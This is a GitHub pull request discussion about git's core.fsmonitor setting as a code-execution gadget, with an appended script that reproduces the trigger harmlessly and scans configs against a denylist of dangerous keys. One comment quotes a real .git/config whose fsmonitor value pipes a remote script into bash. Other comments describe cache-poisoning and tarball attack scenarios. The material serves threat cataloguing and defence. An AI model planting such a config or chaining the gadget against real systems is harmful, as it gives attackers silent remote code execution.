Add git #15

Open: wants to merge 2 commits into base: main
Conversation

ZanyMonk

Add git tool and an example using fsmonitor.

@ZanyMonk ZanyMonk requested a review from a team as a code owner February 22, 2024 23:14
@fproulx-boostsecurity
Contributor

Thank you @ZanyMonk.
We are about to change the license and we’d like to do that before accepting external contributions. I would really like to merge your PR, but first would like to see if you’d agree with contributing under Apache 2.0 instead (see #17)

@ZanyMonk
Author

Of course!
Please feel free to make as much money as you can from this PR ;)

Cheers

@fproulx-boostsecurity
Contributor

> Of course! Please feel free to make as much money as you can from this PR ;)
>
> Cheers

TBH it came from other folks in the community who said they would not contribute if we did not adjust the license. I prefer to align with something that people are most comfortable with, to make that a real community focal point.

Thanks :)

@fproulx-boostsecurity
Contributor

fproulx-boostsecurity commented Feb 23, 2024

@ZanyMonk do you have concrete examples of how this can be exploited in practice in a pipeline by a threat actor?

git push will not push any local changes to the .git/config file in a local clone, so one would need to explicitly copy a template git config file stored inside the repo, like cp config/git_config_template .git/config or something?

@ZanyMonk
Author

ZanyMonk commented Feb 23, 2024

I came across the following example in an exposed .git/config file:

[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        fsmonitor = "bash -c 'curl -s https://[redacted]/static/img/fickdich.js | bash'"
[user]
        email = [redacted]

If you download this file to your host (along with, more or less, the whole .git directory), and then execute git checkout . in the resulting git repository in order to restore the worktree from the raw objects/packs, the command in fsmonitor is executed.

Also, using sh -c 'command' allows running the command as the current user rather than daemon.


This is clearly a footgun, targeted at hackers who would eventually try to dump the repo with tools such as git-dumper (most of those tools use git binaries to achieve their task, therefore triggering the exploit).

This could also be used as a gadget within a bigger exploit chain. Say you can write somewhat arbitrary files but you can't execute; then you could eventually use this method to gain command execution. I think this part could be useful in the context of a pipeline/supply chain attack, but I may be wrong!

@fproulx-boostsecurity
Contributor

fproulx-boostsecurity commented Feb 23, 2024

Yes, yes, I certainly don't disagree with it being a LOTP; it's just that this is much less likely to be found directly in CI/CD. In terms of the SLSA threat model this is more an attack on the dev's workstation.

All I'm saying is that I'm happy to include, but I'm thinking how to refactor the tool pages to call out the different threat models.


@AdnaneKhan

AdnaneKhan commented Mar 12, 2024

This is definitely a useful gadget in a CI/CD scenario with cache poisoning where there is a call to git checkout after a cache restore step. For GitHub Actions at least, a poisoned cache is arbitrary file write.

@fproulx-boostsecurity
Contributor

Hey @AdnaneKhan. Sorry, I just saw this now.
Can you elaborate with an example?

We were discussing internally the other day about accepting the PR but adding some caveats and more concrete, realistic scenarios.

The easiest that comes to mind was a tarball containing a .git followed by some git command.

But I really like your idea.
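The three scenarios raised in this thread (an exposed .git dumped to disk and followed by git checkout ., a poisoned cache restored before a git checkout step, and a tarball containing a .git followed by some git command) all reduce to the same gadget: git reads a .git/config it did not write and executes the core.fsmonitor value. The script below is an added example, not code from the lotp project or from anyone in this thread. It reproduces the trigger in a scratch directory with a harmless stand-in payload (sh -c 'touch ...' instead of the curl | bash from the redacted sample) and shows the pre-check a dumper tool or pipeline step can run on an untrusted config before invoking git there. The denylist of config keys, the example.invalid hostname and the scratch-directory layout are assumptions made for this example.

```shell
#!/bin/sh
# Added example; not code from the lotp project or from anyone in this thread.
# scan_git_config: the check a dumper tool or a CI job should run on an
#   untrusted .git/config before invoking git inside that directory.
# reproduce_fsmonitor_trigger: builds a scratch repo carrying a harmless
#   core.fsmonitor command, packs its .git into a tarball (a dump, a restored
#   cache), unpacks it elsewhere and shows that `git checkout .` runs the
#   command. Needs git on PATH; returns 2 when it is missing.
set -eu

# Config keys whose value git hands to a shell. Constructed denylist for this
# example: core.fsmonitor is the one from the thread, the others are the usual
# suspects; it is not exhaustive (git config keys are case-insensitive).
DANGEROUS_KEYS='core.fsmonitor core.hookspath core.sshcommand core.pager core.editor core.gitproxy core.askpass'

# scan_git_config FILE: print every "section.key = value" hit; exit 1 if any
# dangerous key is present, 0 if the file is clean.
scan_git_config() {
    awk -v keys="$DANGEROUS_KEYS" '
        BEGIN { n = split(keys, k, " "); for (i = 1; i <= n; i++) bad[k[i]] = 1 }
        /^[ \t]*[#;]/ { next }                 # comment line
        /^[ \t]*\[/ {                          # [section] or [section "sub"]
            s = $0
            sub(/^[ \t]*\[[ \t]*/, "", s)
            sub(/[] \t"].*$/, "", s)
            sec = tolower(s)
            next
        }
        /=/ {                                  # key = value (first "=" splits)
            key = $0; sub(/=.*$/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", key)
            val = $0; sub(/^[^=]*=[ \t]*/, "", val)
            full = sec "." tolower(key)
            if (full in bad) { print full " = " val; found = 1 }
        }
        END { exit found ? 1 : 0 }
    ' "$1"
}

# reproduce_fsmonitor_trigger DIR: DIR is an absolute path without spaces or
# quotes (it is interpolated into the hook command). Returns 0 if the hook
# command ran during `git checkout .`, 1 if it did not, 2 if git is missing.
reproduce_fsmonitor_trigger() {
    dir=$1
    command -v git >/dev/null 2>&1 || return 2
    marker="$dir/fsmonitor-ran"
    mkdir -p "$dir/origin" "$dir/dump"
    rm -f "$marker"

    # Attacker side: an ordinary repo with one tracked file, plus the gadget.
    # git runs the core.fsmonitor value through sh with the hook protocol
    # version and a token appended as arguments, which is why the in-the-wild
    # sample wraps its payload in `bash -c '...'`; `sh -c '...'` does the same.
    # HOME/GIT_CONFIG_NOSYSTEM keep the user's own git config out of the way.
    ( cd "$dir/origin" &&
      export HOME="$dir" GIT_CONFIG_NOSYSTEM=1 &&
      git -c init.defaultBranch=main init -q . &&
      echo hello > README &&
      git add README &&
      git -c user.name=x -c user.email=x@example.invalid commit -q -m init &&
      git config core.fsmonitor "sh -c 'touch $marker'" &&
      tar cf "$dir/poisoned.tar" .git ) || return 1

    # Victim side: unpack the .git (what git-dumper, a poisoned cache or a
    # tarball leaves behind) and restore the worktree from the objects. The
    # benign hook prints no fsmonitor token, so git warns and falls back to a
    # full index refresh; stderr is silenced only to keep that warning quiet.
    tar xf "$dir/poisoned.tar" -C "$dir/dump" || return 1
    ( cd "$dir/dump" &&
      export HOME="$dir" GIT_CONFIG_NOSYSTEM=1 &&
      git checkout -q . 2>/dev/null ) || return 1

    [ -f "$marker" ]
}

# Stand-alone run: `sh this.sh run`
if [ "${1-}" = "run" ]; then
    work=$(mktemp -d)
    if reproduce_fsmonitor_trigger "$work"; then
        echo "hook command ran during 'git checkout .'"
        scan_git_config "$work/dump/.git/config" || echo "refuse: this .git would execute commands"
    fi
    rm -rf "$work"
fi
```

Run it as sh this.sh run; without git it exits 2 instead of demonstrating the trigger. The scan is a denylist, so treat it as a pre-check rather than a guarantee (hooks under .git/hooks are a separate vector it does not look at). The robust fix for a dumper or a pipeline step is to never run git against a .git it did not produce itself: parse the objects with a library, or copy only objects and refs into a fresh git init and let git rebuild the index from there.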
